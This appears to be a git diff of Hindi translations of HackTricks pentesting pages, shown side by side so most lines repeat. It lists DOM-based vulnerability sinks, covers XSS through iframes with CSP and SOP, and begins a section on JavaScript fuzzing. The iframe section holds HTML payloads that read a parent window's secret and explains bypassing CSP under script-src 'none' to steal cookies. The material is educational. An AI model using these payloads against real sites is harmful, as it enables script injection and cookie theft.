**HTML5-संग्रहण में परिवर्तन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावादी-नियंत्रित डेटा को वेब ब्राउज़र के HTML5 संग्रहण** (`localStorage` या `sessionStorage`) में संग्रहित करता है। यह कार्रवाई स्वत: में एक सुरक्षा दोष नहीं है, लेकिन यह समस्यात्मक हो जाता है अगर एप्लिकेशन उस संग्रहित डेटा को फिर से पढ़ता है और असुरक्षित रूप से प्रसंस्करण करता है। यह एक हमलावादी को स्टोरेज तंत्र का उपयोग करके अन्य DOM-आधारित हमलों को करने की अनुमति देता है, जैसे क्रॉस-साइट स्क्रिप्टिंग और जावास्क्रिप्ट इन्जेक्शन। **HTML5-संग्रहन संशोधन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावादी-नियंत्रित डेटा को वेब ब्राउज़र के HTML5 संग्रह में संग्रहित** करता है (`localStorage` या `sessionStorage`). यह कार्रवाई स्वतः में एक सुरक्षा दोष नहीं है, लेकिन यह समस्यात्मक हो जाता है अगर एप्लिकेशन उस संग्रहित डेटा को फिर से पढ़ता है और असुरक्षित रूप से प्रसंस्करण करता है। यह एक हमलावादी को स्टोरेज तंत्र का उपयोग करके अन्य DOM-आधारित हमलों को करने की अनुमति देता है, जैसे क्रॉस-साइट स्क्रिप्टिंग और जावास्क्रिप्ट इन्जेक्शन।
Sinks: Sinks:
```javascript ```javascript
@ -241,7 +241,7 @@ someDOMElement.evaluate()
From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection) From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
**DOM-आधारित JSON-इन्जेक्शन सुरक्षा दोष** उस समय होते हैं जब एक स्क्रिप्ट **एक स्ट्रिंग में एकत्रित किया जाने वाला डेटा शामिल करता है जो एक JSON डेटा संरचना के रूप में पार्स किया जाता है और फिर एप्लिकेशन द्वारा प्रोसेस किया जाता है**। **DOM-आधारित JSON-इन्जेक्शन सुरक्षा दोष** उस समय होते हैं जब एक स्क्रिप्ट **एक स्ट्रिंग में एकत्रित किया जाने वाला डेटा शामिल करता है जो एक JSON डेटा संरचना के रूप में विश्लेषित किया जाता है और फिर एप्लिकेशन द्वारा प्रसंस्कृत किया जाता है**.
Sinks: Sinks:
```javascript ```javascript
@ -253,17 +253,17 @@ $.parseJSON()
From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation) From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
**वेब-संदेश सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट अटैकर-नियंत्रित डेटा को एक वेब संदेश के रूप में अन्य दस्तावेज़ में भेजता है जो ब्राउज़र के अंदर होता है। एक उदाहरण वेब-संदेश मानिपुलेशन का [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) पर मिल सकता है। **वेब-संदेश सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट अपने द्वारा नियंत्रित किए गए डेटा को एक अन्य दस्तावेज़ में वेब संदेश के रूप में भेजता है जो ब्राउज़र के अंदर होता है। एक उदाहरण वेब-संदेश मानिपुलेशन का [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) पर मिल सकता है।
Sinks: Sinks:
`postMessage()` वेब संदेश भेजने के लिए विधि एक सुरक्षा दोष के लिए ले जा सकती है अगर संयोजक संदेश प्राप्त करने के लिए घटना सुनने वाले उपकरण ने आने वाले डेटा को एक असुरक्षित तरीके से संभाला। `postMessage()` वेब संदेश भेजने के लिए विधि एक सुरक्षा दोष की ओर ले जा सकती है अगर संयोजक संदेश प्राप्त करने के लिए घटना सुनने वाले डेटा को एक असुरक्षित तरीके से संभाल है
### DOM-डेटा मानिपुलेशन ### DOM-डेटा मानिपुलेशन
From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation) From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
**DOM-डेटा मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट एक फ़ील्ड में अटैकर-नियंत्रित डेटा लिखता है जो दृश्यमान UI या क्लाइंट-साइड तर्क में उपयोग किया जाता है। इस सुरक्षा दोष का शिकार होने पर एक हमलावर द्वारा एक URL को उपयोग करके एक ऐसा निर्माण किया जा सकता है जो, अगर दूसरे उपयोगकर्ता द्वारा देखा जाता है, तो क्लाइंट-साइड UI की उपस्थिति या व्यवहार को बदल सकता है। **DOM-डेटा मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट डोम के भीतर एक क्षेत्र में **हमलावर-नियंत्रित डेटा लिखता है** जो दृश्यमान यूआई या क्लाइंट-साइड तर्क में उपयोग किया जाता है। एक हमलावर इस सुरक्षा दोष का शिकार बना सकता है ताकि वह एक URL बना सके जिसे अगर किसी अन्य उपयोगकर्ता द्वारा देखा जाता है, तो वह क्लाइंट-साइड यूआई की दिखावट या व्यवहार को बदल सकता है।
Sinks: Sinks:
```javascript ```javascript
@ -294,7 +294,7 @@ history.replaceState()
From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service) From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
**DOM-आधारित सेवा की इनकार वंश्यताएं** उत्पन्न होती हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को एक समस्यात्मक प्लेटफ़ॉर्म API में सुरक्षित रूप से पारित** करता है। इसमें वह API शामिल हैं जो, जब आह्वानित किया जाता है, तो उपयोगकर्ता के कंप्यूटर को **अत्यधिक मात्रा में CPU या डिस्क स्थान** का उपभोग करने की ओर ले जा सकते हैं। ऐसी भयानक दोषाएं हो सकती हैं, जैसे ब्राउज़र जो वेबसाइट की कार्यक्षमता को प्रतिबंधित करके `localStorage` में डेटा संग्रहित करने के प्रयासों को अस्वीकार करने या व्यस्त स्क्रिप्टों को समाप्त करके। **DOM-आधारित सेवा की इनकार वंश्यताएं** उस समय होती हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को समस्यात्मक प्लेटफ़ॉर्म API में सुरक्षित ढंग से पारित** करता है। इसमें वह API शामिल हैं जो, जब आह्वानित किया जाता है, तो उपयोगकर्ता कंप्यूटर को **अत्यधिक मात्रा में CPU या डिस्क स्थान** का उपभोग करने की ओर ले जा सकते हैं। ऐसी वंश्यताएं महत्वपूर्ण परिणाम देने की क्षमता रखती हैं, जैसे ब्राउज़र जो वेबसाइट की कार्यक्षमता को प्रतिबंधित करके `localStorage` में डेटा संग्रहित करने की कोशिशों को अस्वीकार करने या व्यस्त स्क्रिप्टों को समाप्त करके।
Sinks: Sinks:
```javascript ```javascript
@ -311,10 +311,10 @@ RegExp()
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **नवीनतम संस्करण को देखना चाहते हैं या पीईएएस को डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें। * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स रेपो (https://github.com/carlospolop/hacktricks) और **हैकट्रिक्स-क्लाउड रेपो** (https://github.com/carlospolop/hacktricks-cloud) को PR जमा करके * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)
</details> </details>

View file

@ -1,26 +1,26 @@
# XSS में आईफ्रेम, सीएसपी और एसओप # Iframes में XSS, CSP और SOP
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को पीडीएफ में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके
</details> </details>
## XSS में आईफ्रेम ## XSS में Iframes
एक आईफ्रेम पेज की सामग्री को दर्शाने के लिए 3 तरीके हैं: एक iframed पेज की सामग्री को दर्शाने के लिए 3 तरीके हैं:
* `src` के माध्यम से एक URL को दर्शाते हुए (URL cross origin या same origin हो सकता है) * `src` के माध्यम से URL को दर्शाना (URL cross origin या same origin हो सकता है)
* `data:` प्रोटोकॉल का उपयोग करके सामग्री को दर्शाते हुए `src` के माध्यम से * `data:` प्रोटोकॉल का उपयोग करके सामग्री को दर्शाना
* `srcdoc` के माध्यम से सामग्री को दर्शाते हुए * `srcdoc` के माध्यम से सामग्री को दर्शाना
**माता और बालक के वेरिएबल्स तक पहुंचना** **Parent & Child vars तक पहुंचना**
```html ```html
<html> <html>
<script> <script>
@ -51,17 +51,17 @@ var secret="child secret";
alert(parent.secret) alert(parent.secret)
</script> </script>
``` ```
यदि आप पिछले html तक http सर्वर के माध्यम से एक्सेस करते हैं (जैसे `python3 -m http.server`) तो आप देखेंगे कि सभी स्क्रिप्ट्स क्रियान्वित हो जाएंगे (क्योंकि इसे रोकने वाला कोई CSP नहीं है)। **माता-पिता आईफ्रेम के भीतर `secret` वेरिएबल तक पहुंच नहीं पाएंगे** और **केवल आफ्रेम if2 और if3 (जो सेम-साइट माने जाते हैं) मूल विंडो में गुप्त तक पहुंच सकते हैं**।\ यदि आप पिछले html तक http सर्वर के माध्यम से पहुंचते हैं (जैसे `python3 -m http.server`) तो आप देखेंगे कि सभी स्क्रिप्ट्स क्रियान्वित होंगे (क्योंकि इसे रोकने वाला कोई CSP नहीं है)। **माता-पिता किसी भी आइफ्रेम के अंदर `secret` वेरिएबल तक पहुंच नहीं पाएंगे** और **केवल आफ्रेम if2 और if3 (जो सेम-साइट माने जाते हैं) मूल विंडो में सीक्रेट तक पहुंच सकते हैं**।
ध्यान दें कि if4 को `null` मूल माना जाता है। नोट करें कि if4 को `null` मूल माना जाता है।
### CSP के साथ आफ्रेम <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a> ### CSP के साथ आफ्रेम <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
{% hint style="info" %} {% hint style="info" %}
कृपया ध्यान दें कि निम्नलिखित बायपास में जबाब आईफ्रेम पेज को कोई भी CSP हेडर नहीं है जो JS क्रियान्वयन को रोकता है। कृपया ध्यान दें कि निम्नलिखित बायपास में जबाब देने वाले पेज का उत्तर कोई भी CSP हेडर नहीं है जो JS क्रियान्वयन को रोकता है।
{% endhint %} {% endhint %}
`script-src` का `self` मान जीएस कोड का क्रियान्वयन `data:` प्रोटोकॉल या `srcdoc` विशेषता का उपयोग करके नहीं करने देगा।\ `script-src` का `self` मान जीएस कोड का क्रियान्वयन `data:` प्रोटोकॉल या `srcdoc` विशेषता का उपयोग करके नहीं करने देगा।\
हालांकि, CSP का `none` मान भी उन आफ्रेम का क्रियान्वयन करने देगा जो `src` विशेषता में एक URL (पूरा या केवल पथ) डालते हैं।\ हालांकि, CSP का `none` मान भी उन आफ्रेम का क्रियान्वयन करने देगा जो `src` विशेषता में URL (पूरा या केवल पथ) डालते हैं।\
इसलिए एक पृष्ठ का CSP बायपास करना संभव है: इसलिए एक पृष्ठ का CSP बायपास करना संभव है:
```html ```html
<html> <html>
@ -77,14 +77,14 @@ var secret = "31337s3cr37t";
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe> <iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html> </html>
``` ```
नोट करें कि **पिछला सीएसपी केवल इनलाइन स्क्रिप्ट का निषेध करता है**।\ नोट करें कि **पिछला CSP केवल इनलाइन स्क्रिप्ट का निषेध करता है**।\
हालांकि, **केवल `if1` और `if2` स्क्रिप्ट को चलाया जाएगा लेकिन केवल `if1` माता सीक्रेट तक पहुंच सकेगा** हालांकि, **केवल `if1` और `if2` स्क्रिप्ट को चलाया जाएगा लेकिन केवल `if1` माता सीक्रेट तक पहुंच सकेगा**
![](<../../.gitbook/assets/image (627) (1) (1).png>) ![](<../../.gitbook/assets/image (627) (1) (1).png>)
इसलिए, यदि आप सर्वर पर एक JS फ़ाइल अपलोड कर सकते हैं और इसे आईफ्रेम के माध्यम से लोड कर सकते हैं, तो **एक सीएसपी को छलकर सकते हैं भले ही `script-src 'none'` हो**। यह **समान-स्थल JSONP एंडपॉइंट का दुरुपयोग करके भी संभव है**। इसलिए, यदि आप सर्वर पर एक JS फ़ाइल अपलोड कर सकते हैं और इसे आईफ्रेम के माध्यम से लोड कर सकते हैं, तो **एक CSP को छलना संभव है, भले ही `script-src 'none'` हो**। यह **संभावित रूप से एक समान-स्थान JSONP एंडपॉइंट का दुरुपयोग करके भी किया जा सकता है**।
आप इसे निम्नलिखित परिदृश्य के साथ परीक्षण कर सकते हैं जहां एक कुकी चोरी की जाती है भले ही `script-src 'none'` हो। बस एप्लिकेशन को चलाएं और अपने ब्राउज़र के साथ इसका उपयोग करें: आप इसे निम्नलिखित परिदृश्य के साथ परीक्षण कर सकते हैं जहां एक कुकी चोरी की जाती है, भले ही `script-src 'none'` हो। बस एप्लिकेशन को चलाएं और अपने ब्राउज़र के साथ इसका उपयोग करें:
```python ```python
import flask import flask
from flask import Flask from flask import Flask
@ -117,22 +117,22 @@ app.run()
आईफ्रेम के भीतर की सामग्री को `sandbox` विशेषता का उपयोग करके अतिरिक्त प्रतिबंधों के लिए विचाराधीन किया जा सकता है। डिफ़ॉल्ट रूप से, इस विशेषता का उपयोग नहीं होता है, जिसका मतलब है कि कोई प्रतिबंध नहीं हैं। आईफ्रेम के भीतर की सामग्री को `sandbox` विशेषता का उपयोग करके अतिरिक्त प्रतिबंधों के लिए विचाराधीन किया जा सकता है। डिफ़ॉल्ट रूप से, इस विशेषता का उपयोग नहीं होता है, जिसका मतलब है कि कोई प्रतिबंध नहीं हैं।
जब इस्तेमाल किया जाता है, `sandbox` विशेषता कई प्रतिबंध लागू करती हैं: जब इस्तेमाल किया जाता है, `sandbox` विशेषता कई प्रतिबंध लगाती हैं:
- सामग्री को एक अद्वितीय स्रोत से उत्पन्न माना जाता है। - सामग्री को एक अद्वितीय स्रोत से उत्पन्न माना जाता है।
- किसी भी प्रपत्र को सबमिट करने का प्रयास रोका जाता है। - किसी भी प्रपत्रों को सबमिट करने का प्रयास रोका जाता है।
- स्क्रिप्ट का क्रियान्वयन निषिद्ध है। - स्क्रिप्ट का क्रियान्वयन निषिद्ध है।
- कुछ एपीआई तक पहुंच बंद है। - कुछ एपीआई तक पहुंच बंद है।
- यह लिंक को अन्य ब्राउज़िंग संदर्भों के साथ बातचीत करने से रोकता है। - यह लिंक को अन्य ब्राउज़िंग संदर्भों के साथ बातचीत करने से रोकता है।
- `<embed>`, `<object>`, `<applet>` या समान टैग के माध्यम से प्लगइन का उपयोग अनुमति नहीं है। - `<embed>`, `<object>`, `<applet>` या समान टैग के माध्यम से प्लगइन का उपयोग अनुमति नहीं है।
- सामग्री के शीर्ष-स्तर ब्राउज़िंग संदर्भ की संदर्भीकरण को रोका जाता है। - सामग्री के शीर्ष-स्तर ब्राउज़िंग संदर्भ की संदर्भीकरण को रोका जाता है।
- वीडियो प्लेबैक या प्रपत्र नियंत्रणों के स्वत: ट्रिगर होने वाले विशेषताएं रोकी जाती हैं - वीडियो प्लेबैक या फॉर्म नियंत्रणों का स्वत: ट्रिगर होना, जैसे कि वीडियो प्लेबैक या फॉर्म नियंत्रणों का स्वत: ट्रिगर होना, रोका जाता है
विशेषता का मान खाली छोड़ा जा सकता है (`sandbox=""`) ताकि सभी पूर्ववर्णित प्रतिबंध लागू हों। वैकल्पिक रूप से, इसे कुछ विशेष मानों की एक अंतरिक्ष से आईफ्रेम को छुट्टी देने वाली सभी प्रतिबंधों से मुक्त करने के लिए एक अंतरिक्ष में स्थानांतरित सूची में सेट किया जा सकता है। विशेषता का मान खाली छोड़ा जा सकता है (`sandbox=""`) ताकि सभी पूर्ववर्णित प्रतिबंध लागू हों। वैकल्पिक रूप से, इसे विशेष लाभों से आईफ्रेम को छुट्टी देने वाले विशेष मूल्यों की एक अंतरिक्ष-विभाजित सूची में सेट किया जा सकता है।
```html ```html
<iframe src="demo_iframe_sandbox.htm" sandbox></iframe> <iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
``` ```
## Iframes में SOP ## Iframes in SOP
निम्नलिखित पृष्ठों की जाँच करें: निम्नलिखित पृष्ठों की जाँच करें:
@ -156,10 +156,10 @@ app.run()
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **नवीनतम संस्करण को पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें * [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**. * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -1,20 +1,20 @@
# विविध जेएस ट्रिक्स और संबंधित जानकारी # अन्य JS ट्रिक्स और संबंधित जानकारी
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को पीडीएफ में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>
## जावास्क्रिप्ट फजिंग ## जावास्क्रिप्ट फजिंग
### मान्य जेएस टिप्पणी वर्ण ### मान्य JS टिप्पणी वर्ण
```javascript ```javascript
//This is a 1 line comment //This is a 1 line comment
/* This is a multiline comment*/ /* This is a multiline comment*/
@ -65,16 +65,7 @@ log.push([i,j])
} }
console.log(log)//[35,33],[47,47] console.log(log)//[35,33],[47,47]
``` ```
### मान्य जेएस नए लाइन वर्ण ### मान्य JS नए लाइन चर
जेएस कोड में नई पंक्तियों को दर्शाने के लिए निम्नलिखित वर्ण प्रयोग किए जा सकते हैं:
